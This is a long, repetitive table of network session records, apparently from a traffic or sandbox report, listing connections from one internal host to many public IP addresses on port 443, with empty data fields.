                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18744192.168.2.1459646129.145.33.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18745192.168.2.1435834221.29.163.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18746192.168.2.1450634149.91.115.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18747192.168.2.1450794154.134.224.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18748192.168.2.144296269.86.98.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18749192.168.2.1452106181.95.68.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18750192.168.2.1433094111.60.155.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18751192.168.2.1458876219.11.159.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18752192.168.2.1457892158.91.38.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18753192.168.2.145469247.110.171.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18754192.168.2.144346669.150.133.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18755192.168.2.145142659.92.231.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18756192.168.2.1439990192.232.184.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18757192.168.2.144318644.173.219.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18758192.168.2.1441160156.236.240.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18759192.168.2.144069458.86.110.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18760192.168.2.144591041.143.52.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18761192.168.2.145038096.32.184.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18762192.168.2.1434354136.213.218.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18763192.168.2.1440098222.9.227.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18764192.168.2.144600265.14.108.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18765192.168.2.1452778171.117.117.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18766192.168.2.1452858159.224.65.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18767192.168.2.1441952162.125.151.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18768192.168.2.145091893.105.37.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18769192.168.2.145127292.79.74.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18770192.168.2.145530089.227.176.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18771192.168.2.146003668.35.205.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18772192.168.2.1454450136.92.60.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18773192.168.2.1454534118.5.170.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18774192.168.2.1441984181.212.241.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18775192.168.2.144023061.106.225.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18776192.168.2.1443422166.109.218.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18777192.168.2.1436720132.78.74.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18778192.168.2.1442080122.169.124.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18779192.168.2.1454248195.71.234.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18780192.168.2.1438250112.157.31.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18781192.168.2.144630444.134.234.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18782192.168.2.1453960201.53.32.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18783192.168.2.145771680.236.175.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18784192.168.2.1438368157.32.219.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18785192.168.2.1452760207.108.107.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18786192.168.2.1434604101.14.254.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18787192.168.2.1439510136.97.156.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18788192.168.2.1434230112.136.211.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18789192.168.2.1436132113.181.217.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18790192.168.2.1444624175.19.248.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18791192.168.2.1448930181.252.165.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18792192.168.2.1441410170.177.3.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18793192.168.2.145221084.249.22.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18794192.168.2.1455462212.71.101.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18795192.168.2.1449754107.214.138.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18796192.168.2.1435566186.241.9.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18797192.168.2.1452644128.98.151.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18798192.168.2.1454248201.227.142.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18799192.168.2.1438772177.207.200.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18800192.168.2.1459424124.73.189.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18801192.168.2.1445536202.235.108.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18802192.168.2.145296827.254.172.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18803192.168.2.144794227.99.96.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18804192.168.2.1449364139.181.178.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18805192.168.2.144130677.35.41.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18806192.168.2.1459480179.98.178.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18807192.168.2.144572898.217.236.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18808192.168.2.1436340113.103.225.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18809192.168.2.14596748.91.57.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18810192.168.2.145022677.39.241.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18811192.168.2.143668474.148.166.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18812192.168.2.145771866.220.18.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18813192.168.2.143462889.16.228.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18814192.168.2.144931643.33.126.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18815192.168.2.1441626149.251.247.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18816192.168.2.1458982108.63.223.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18817192.168.2.1448784146.143.17.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18818192.168.2.1441838181.8.21.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18819192.168.2.146046246.32.197.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18820192.168.2.145515450.207.211.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18821192.168.2.1442130195.13.32.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18822192.168.2.1434434172.162.82.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18823192.168.2.14392884.101.34.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18824192.168.2.143789464.170.140.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18825192.168.2.144756289.58.83.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18826192.168.2.143374673.161.74.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18827192.168.2.1454728187.243.122.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18828192.168.2.1451324140.33.253.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18829192.168.2.1439250186.75.45.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18830192.168.2.1444398153.122.221.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18831192.168.2.145704076.103.161.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18832192.168.2.1442592171.100.243.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18833192.168.2.1439688145.176.89.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18834192.168.2.1432862118.252.124.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18835192.168.2.1432902142.21.8.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18836192.168.2.145508242.62.178.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18837192.168.2.145591091.51.57.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18838192.168.2.1451214218.70.108.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18839192.168.2.1459860143.118.112.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18840192.168.2.144144027.225.165.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18841192.168.2.1452262133.103.22.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18842192.168.2.143951688.47.229.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18843192.168.2.1451596147.129.241.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18844192.168.2.1439096220.147.102.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18845192.168.2.1435372120.220.30.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18846192.168.2.144757681.45.58.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18847192.168.2.1447806140.3.22.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18848192.168.2.145211879.123.221.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18849192.168.2.1435112171.157.11.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18850192.168.2.1445796162.170.3.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18851192.168.2.1452460128.142.54.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18852192.168.2.1442468217.113.83.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18853192.168.2.1455330183.249.89.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18854192.168.2.144953487.88.16.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18855192.168.2.144126054.122.179.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18856192.168.2.1457966128.47.180.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18857192.168.2.144756267.156.2.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18858192.168.2.143721652.55.28.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18859192.168.2.144080083.77.64.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18860192.168.2.145490699.54.94.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18861192.168.2.143658080.103.150.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18862192.168.2.145521640.218.236.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18863192.168.2.1447314203.77.144.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18864192.168.2.1454842131.85.40.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18865192.168.2.144840017.174.228.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18866192.168.2.1451592150.104.211.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18867192.168.2.1446352115.2.169.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18868192.168.2.1441394163.235.23.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18869192.168.2.144042689.142.45.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18870192.168.2.1446234169.46.111.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18871192.168.2.1448524206.59.122.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18872192.168.2.144421869.253.161.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18873192.168.2.14607181.109.156.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18874192.168.2.1445892149.120.108.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18875192.168.2.1434324158.102.177.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18876192.168.2.1455124164.239.29.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18877192.168.2.145750897.72.101.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18878192.168.2.144221839.44.185.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18879192.168.2.144135617.230.84.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18880192.168.2.1449946137.239.105.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18881192.168.2.1452426172.91.21.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18882192.168.2.1444694106.191.83.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18883192.168.2.1459342157.4.220.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18884192.168.2.1446496149.161.241.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18885192.168.2.14367668.178.254.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18886192.168.2.1452736164.91.70.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18887192.168.2.143551620.10.162.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18888192.168.2.144163059.98.100.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18889192.168.2.1447530190.29.230.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18890192.168.2.1438908145.160.124.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18891192.168.2.1452516202.12.196.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18892192.168.2.145679274.9.134.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18893192.168.2.144277866.226.165.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18894192.168.2.144477851.156.84.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18895192.168.2.145078285.87.152.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18896192.168.2.144040461.246.169.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18897192.168.2.1440066172.181.192.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18898192.168.2.144965019.86.42.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18899192.168.2.1441986168.234.88.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18900192.168.2.1442616196.186.195.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18901192.168.2.144587097.78.17.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18902192.168.2.144063895.191.40.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18903192.168.2.14540324.78.163.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18904192.168.2.1446162112.164.217.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18905192.168.2.14397821.215.24.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18906192.168.2.1458370165.239.160.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18907192.168.2.1436770139.60.73.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18908192.168.2.145485464.229.236.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18909192.168.2.145866492.65.201.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18910192.168.2.144685086.63.147.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18911192.168.2.144705860.222.23.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18912192.168.2.1433370149.57.221.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18913192.168.2.143455851.102.125.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18914192.168.2.1434194169.200.200.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18915192.168.2.145949212.171.162.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18916192.168.2.14535085.111.117.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18917192.168.2.1444428178.216.129.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18918192.168.2.1450242194.60.26.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18919192.168.2.143689617.80.101.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18920192.168.2.1436390207.43.183.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18921192.168.2.146002690.26.64.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18922192.168.2.1447910147.63.80.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18923192.168.2.145637461.130.117.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18924192.168.2.1458138188.109.247.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18925192.168.2.143562245.143.238.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18926192.168.2.1449190154.224.152.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18927192.168.2.1453594140.181.14.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18928192.168.2.143994843.251.97.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18929192.168.2.1433166128.172.146.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18930192.168.2.144130831.65.58.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18931192.168.2.1450280108.70.200.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18932192.168.2.1435938164.83.51.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18933192.168.2.1450088222.13.227.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18934192.168.2.1448774173.176.130.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18935192.168.2.144236239.22.231.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18936192.168.2.1440582156.74.199.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18937192.168.2.14481564.135.32.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18938192.168.2.145987083.94.189.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18939192.168.2.144147263.6.161.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18940192.168.2.1452288169.83.198.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18941192.168.2.143881885.141.24.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18942192.168.2.146077084.161.114.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18943192.168.2.1451816206.18.101.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18944192.168.2.14536189.23.168.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18945192.168.2.143464695.88.184.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18946192.168.2.144465076.107.134.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18947192.168.2.1437310164.179.173.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18948192.168.2.1439516184.172.175.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18949192.168.2.1456444198.119.201.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18950192.168.2.143745844.244.228.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18951192.168.2.1451058141.149.241.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18952192.168.2.143441046.36.24.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18953192.168.2.143307027.176.197.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18954192.168.2.143486889.196.247.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18955192.168.2.1437846129.195.61.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18956192.168.2.1432818157.126.84.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18957192.168.2.1456848107.60.78.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18958192.168.2.1456870199.165.83.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18959192.168.2.145066470.41.98.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18960192.168.2.1452112200.54.66.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18961192.168.2.145592490.85.107.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18962192.168.2.1441730105.169.95.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18963192.168.2.1440782140.191.41.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18964192.168.2.1440968108.118.9.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18965192.168.2.1455832163.152.222.12443
